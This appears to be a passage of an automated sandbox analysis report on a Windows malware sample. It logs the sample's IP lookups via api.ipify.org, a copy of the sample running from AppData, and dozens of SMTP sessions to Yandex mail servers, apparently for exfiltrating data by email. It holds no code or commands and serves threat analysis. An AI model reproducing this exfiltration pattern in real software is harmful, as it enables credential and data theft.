                                                                                                              Jan 11, 2025 09:23:26.509385109 CET1.1.1.1192.168.2.40xdde8No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 09:23:28.163331985 CET1.1.1.1192.168.2.40xe479No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 09:23:28.163331985 CET1.1.1.1192.168.2.40xe479No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • api.ipify.org

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449733104.26.13.2054437412C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 08:23:27 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-11 08:23:27 UTC424INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 08:23:27 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9003813ac9e75e79-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1834170&cwnd=225&unsent_bytes=0&cid=a6bc1fcf31a2f0ff&ts=246&x=0"
                                                                                                              2025-01-11 08:23:27 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449737104.26.13.2054437836C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 08:23:30 UTC155OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                              Host: api.ipify.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-11 08:23:30 UTC424INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 11 Jan 2025 08:23:30 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 12
                                                                                                              Connection: close
                                                                                                              Vary: Origin
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 900381524a254307-EWR
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1551&rtt_var=596&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1814791&cwnd=239&unsent_bytes=0&cid=3e674efc2b61417a&ts=263&x=0"
                                                                                                              2025-01-11 08:23:30 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                              Data Ascii: 8.46.123.189


                                                                                                              SMTP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                              Jan 11, 2025 09:23:29.023623943 CET5874973477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736583808-SNkJ5EBOdKo0
                                                                                                              Jan 11, 2025 09:23:29.023920059 CET49734587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:23:29.263776064 CET5874973477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:23:29.263958931 CET49734587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:23:29.503464937 CET5874973477.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:23:32.282655001 CET5874973877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net Ok 1736583812-WNkUWKBMgCg0
                                                                                                              Jan 11, 2025 09:23:32.282916069 CET49738587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:23:32.515456915 CET5874973877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-31.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:23:32.517553091 CET49738587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:23:32.749799013 CET5874973877.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:24:58.454283953 CET5874997977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1736583898-wOko7u7OkOs0
                                                                                                              Jan 11, 2025 09:24:58.454502106 CET49979587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:24:58.678211927 CET5874997977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:24:58.678400040 CET49979587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:24:58.899570942 CET5874997977.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:05.596077919 CET5875001477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1736583905-5PkY947Ok8c0
                                                                                                              Jan 11, 2025 09:25:05.596230030 CET50014587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:05.820884943 CET5875001477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:05.821156025 CET50014587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:06.657536983 CET5875001577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net Ok 1736583906-6Pkf7EBOd8c0
                                                                                                              Jan 11, 2025 09:25:06.657810926 CET50015587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:06.887729883 CET5875001577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:06.890706062 CET50015587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:07.117974043 CET5875001577.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:14.319103956 CET5875001677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-35.klg.yp-c.yandex.net Ok 1736583914-EPkUKHAOpCg0
                                                                                                              Jan 11, 2025 09:25:14.319278955 CET50016587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:14.538232088 CET5875001677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-35.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:14.538539886 CET50016587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:14.758341074 CET5875001677.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:20.059930086 CET5875001777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.klg.yp-c.yandex.net Ok 1736583919-JPkTDMAOjKo0
                                                                                                              Jan 11, 2025 09:25:20.060060978 CET50017587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:20.290060043 CET5875001777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:20.290206909 CET50017587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:20.519932985 CET5875001777.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:21.393100023 CET5875001877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736583921-LPkkrEBOgGk0
                                                                                                              Jan 11, 2025 09:25:21.393271923 CET50018587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:21.628933907 CET5875001877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:21.629147053 CET50018587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:21.915047884 CET5875001877.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:22.234239101 CET5875002077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net Ok 1736583922-LPk8NGBOnOs0
                                                                                                              Jan 11, 2025 09:25:22.234376907 CET50020587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:22.467420101 CET5875002077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:22.467592001 CET50020587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:22.699737072 CET5875002077.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:23.755394936 CET5875002177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net Ok 1736583923-NPkGbIAOlSw0
                                                                                                              Jan 11, 2025 09:25:23.755542994 CET50021587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:23.981525898 CET5875002177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:23.981676102 CET50021587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:24.207832098 CET5875002177.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:27.876780987 CET5875002277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net Ok 1736583927-RPk59OBOmmI0
                                                                                                              Jan 11, 2025 09:25:27.877022028 CET50022587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:28.111804962 CET5875002277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:28.112869024 CET50022587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:28.341754913 CET5875002277.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:34.621213913 CET5875002377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net Ok 1736583934-YPkuB6AOcW20
                                                                                                              Jan 11, 2025 09:25:34.633673906 CET50023587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:34.857601881 CET5875002377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-77.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:34.857780933 CET50023587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:35.004719973 CET5875002477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-78.myt.yp-c.yandex.net Ok 1736583934-YPkpMt7Oi0U0
                                                                                                              Jan 11, 2025 09:25:35.080662966 CET5875002377.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:35.141849041 CET50024587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:35.368484020 CET5875002477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-78.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:35.368799925 CET50024587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:35.595659018 CET5875002477.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:36.394347906 CET5875002577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net Ok 1736583936-aPkBICBOgOs0
                                                                                                              Jan 11, 2025 09:25:36.394577026 CET50025587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:36.625226974 CET5875002577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-63.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:36.625427961 CET50025587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:36.855886936 CET5875002577.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:25:51.678766012 CET5875002677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-29.myt.yp-c.yandex.net Ok 1736583951-pPkcVE2OliE0
                                                                                                              Jan 11, 2025 09:25:51.693444014 CET50026587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:51.921729088 CET5875002677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-29.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:51.921901941 CET50026587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:52.977364063 CET5875002777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1736583952-qPknA38Oh8c0
                                                                                                              Jan 11, 2025 09:25:52.977566004 CET50027587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:25:53.206139088 CET5875002777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:25:53.206382990 CET50027587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:25:53.433656931 CET5875002777.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:04.987261057 CET5875002877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net Ok 1736583964-4QkoG8AOrW20
                                                                                                              Jan 11, 2025 09:26:04.991167068 CET50028587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:05.210743904 CET5875002877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:05.210989952 CET50028587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:05.430490017 CET5875002877.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:07.178759098 CET5875002977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net Ok 1736583967-6QkYmDAOceA0
                                                                                                              Jan 11, 2025 09:26:07.178939104 CET50029587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:07.410754919 CET5875002977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:07.410938025 CET50029587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:07.643043041 CET5875002977.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:15.678908110 CET5875003077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net Ok 1736583975-FQkhjY3OmW20
                                                                                                              Jan 11, 2025 09:26:15.679153919 CET50030587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:15.900332928 CET5875003077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-22.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:15.983357906 CET50030587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:16.204453945 CET5875003077.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:22.019037008 CET5875003177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-74.vla.yp-c.yandex.net Ok 1736583981-LQkOkEBOlW20
                                                                                                              Jan 11, 2025 09:26:22.019265890 CET50031587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:22.249083996 CET5875003177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-74.vla.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:22.249583006 CET50031587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:22.479201078 CET5875003177.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:28.239857912 CET5875003277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1736583988-SQkVVOAOmSw0
                                                                                                              Jan 11, 2025 09:26:28.240025997 CET50032587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:28.464756012 CET5875003277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:28.465151072 CET50032587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:28.689874887 CET5875003277.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:38.713619947 CET5875003377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net Ok 1736583998-cQkdYGBOgiE0
                                                                                                              Jan 11, 2025 09:26:38.714338064 CET50033587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:38.936347008 CET5875003377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-25.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:38.936580896 CET50033587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:39.227468014 CET5875003377.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:58.182179928 CET5875003477.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net Ok 1736584018-wQkarJAOl0U0
                                                                                                              Jan 11, 2025 09:26:58.182718039 CET50034587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:58.321758032 CET5875003577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1736584018-wQk4YFBOcmI0
                                                                                                              Jan 11, 2025 09:26:58.321914911 CET50035587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:26:58.413086891 CET5875003477.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-47.klg.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:58.413254023 CET50034587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:58.549197912 CET5875003577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:26:58.549354076 CET50035587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:26:58.643589973 CET5875003477.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:26:58.776812077 CET5875003577.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:05.298255920 CET5875003677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1736584025-4RkSf08OfOs0
                                                                                                              Jan 11, 2025 09:27:05.298664093 CET50036587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:05.522088051 CET5875003677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:05.522331953 CET50036587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:05.745806932 CET5875003677.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:21.648519039 CET5875003777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.myt.yp-c.yandex.net Ok 1736584041-LRkOqv7OoSw0
                                                                                                              Jan 11, 2025 09:27:21.648883104 CET50037587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:21.875782013 CET5875003777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:21.876019955 CET50037587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:22.102226973 CET5875003777.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:22.861601114 CET5875003877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1736584042-MRkRc38OgKo0
                                                                                                              Jan 11, 2025 09:27:22.874427080 CET50038587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:23.087304115 CET5875003877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:23.099958897 CET50038587192.168.2.477.88.21.158STARTTLS
                                                                                                              Jan 11, 2025 09:27:23.312591076 CET5875003877.88.21.158192.168.2.4220 Go ahead
                                                                                                              Jan 11, 2025 09:27:28.855009079 CET5875003977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net Ok 1736584048-SRkdkW6MiGk0
                                                                                                              Jan 11, 2025 09:27:28.861543894 CET50039587192.168.2.477.88.21.158EHLO 377142
                                                                                                              Jan 11, 2025 09:27:29.085764885 CET5875003977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.iva.yp-c.yandex.net
                                                                                                              250-8BITMIME
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 53477376
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                              250-DSN
                                                                                                              250 ENHANCEDSTATUSCODES
                                                                                                              Jan 11, 2025 09:27:29.086133003 CET50039587192.168.2.477.88.21.158STARTTLS
